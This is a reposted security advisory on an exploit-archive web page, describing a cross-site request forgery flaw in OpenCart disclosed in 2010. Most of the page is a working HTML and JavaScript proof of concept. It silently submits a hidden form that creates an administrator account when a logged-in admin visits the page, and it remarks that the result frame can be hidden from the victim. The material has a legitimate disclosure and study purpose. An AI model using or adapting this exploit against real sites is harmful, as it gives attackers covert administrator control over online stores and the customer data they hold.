首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OpenCart suffers from a cross site request forgery vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2010-02-04  
Advisory Information:

Title: OpenCart CSRF Vulnerability
Advisory URL:
http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/
Date published: 2010-01-28
Vendors contacted: OpenCart
Security Risk: High

Vulnerability Description:

OpenCart is vulnerable to CSRF attacks using the POST method. It is possible to craft a malicious page that will create an administrator user when the victim, who is logged into OpenCart, visits the malicious page.

Proofs of Concept:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <title>OpenCart CSRF Vulnerability</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<script type="text/javascript">
		function csrfInjection()
		{
			var params = {
							'username'		: 'an_attacker',
							'firstname'		: 'attack',
							'lastname'		: 'user',
							'email'			: 'some.user@randomatackerdomain.com',
							'user_group_id'	: '1', //Default group id for administrator level is 1
							'password'		: 'test',
							'confirm'		: 'test',
							'status'		: '1'
						 };
			
			var form = document.createElement("form");
			form.setAttribute("method", "post");
			form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

			for(var key in params) {
				var hiddenField = document.createElement("input");
				hiddenField.setAttribute("type", "hidden");
				hiddenField.setAttribute("name", key);
				hiddenField.setAttribute("value", params[key]);

				form.appendChild(hiddenField);
			}

			attack_result.document.body.appendChild(form);
			form.submit();
		}
	</script>
  </head>
  <body>
    OpenCart CSRF Vulnerability

	<input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />
	<a href="#" onclick="csrfInjection();return false;">Add User</a>

	<p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>
	<iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>
  </body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RPC.cmsd remote PoC for AIX 6.
·Remote command execution explo
·Digital Amp MP3 3.1 (.Mp3) Loc
·UplusFtp Server v1.7.0.12 Remo
·Deepburner pro 1.9.0.228 dbr f
·Qihoo 360 Security Guard breg
·MySQL yaSSL CertDecoder::GetNa
·CoreFTP v2.1 b1637 (password f
·Novell iPrint Client ActiveX C
·Novell iPrint Client ActiveX C
·Vermillion FTP Deamon v1.31 Re
·AstonSoft DeepBurner (DBR File
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved